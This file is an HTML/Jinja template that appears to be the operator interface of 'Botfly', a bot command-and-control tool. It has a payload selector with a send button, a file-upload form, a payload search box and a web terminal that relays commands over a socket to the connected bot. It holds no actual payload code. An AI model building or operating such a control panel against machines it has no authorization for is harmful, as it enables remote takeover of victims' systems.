<!DOCTYPE html>
<html>
{% include 'header.html' %}
{% include 'nav.html' %}
<body>
<!-- Page Content -->
<div class="container">
    <div class="row">
        <div class="col-md-3">
            <ul>
                <div class="input-group">
                    <select id="payload" name="payload" class="form-control">
                        <option>Select payload..</option>
                        {% for payload in payload_list %}
                            <option value="{{ payload }}">{{ payload }}</option>
                        {% endfor %}
                    </select>
                <span class="input-group-btn">
                    <button id="send_payload" class="btn btn-default" type="button" tabindex="-1">
                        <span class="glyphicon glyphicon-play" aria-hidden="true"></span>
                    </button>
                </span>
                </div>
            </ul>

            <ul>
                <form id="upload-file" method="post" enctype="multipart/form-data">
                    <fieldset>
                        <label class="btn btn-default btn-block btn-file ">
                            Upload File <input name="file" type="file" style="display: none;">
                        </label>
                    </fieldset>
                </form>
            </ul>
            <ul>
                <div class="well">
                    <div class="row">
                        <input type="search" class="search-query form-control search-payload"
                               placeholder="Search"/>
                    </div>

                    <div class="row payload-desc">
                        <div class="panel-group payloads" id="accordion">
                        </div>
                    </div>
                </div>
            </ul>

        </div>
        <!--</form>-->

        <div class="col-md-9">
            <div id="terminal"></div>
        </div>
    </div>
    <!-- /.row -->
</div>
<!-- /.container -->
<script>

    terminal = $('#terminal').terminal(function (command, term) {
        //no bot selected
        if ('{{connected}}' == '') {
            terminal.error('No bot selected.');
            return;
        }
        if (command == 'clear') {
            term.clear();
        }

        //send terminal command to server
        socket.emit('send_command', {data: command});
        socket.removeAllListeners('send_command'); //Sloppy, fix this if can. should be outside terminal function ideally
    }, {
        greetings: 'Botfly Terminal',
        height: 800,
        width: 800,
        //update prompt to be name of current user
        prompt: function (callback) {
            callback('{{connected}}> ');
        },
        convertLinks: false
    });


</script>

<script src="{{ url_for('static', filename='js/index.js') }}"></script>

</body>
</html>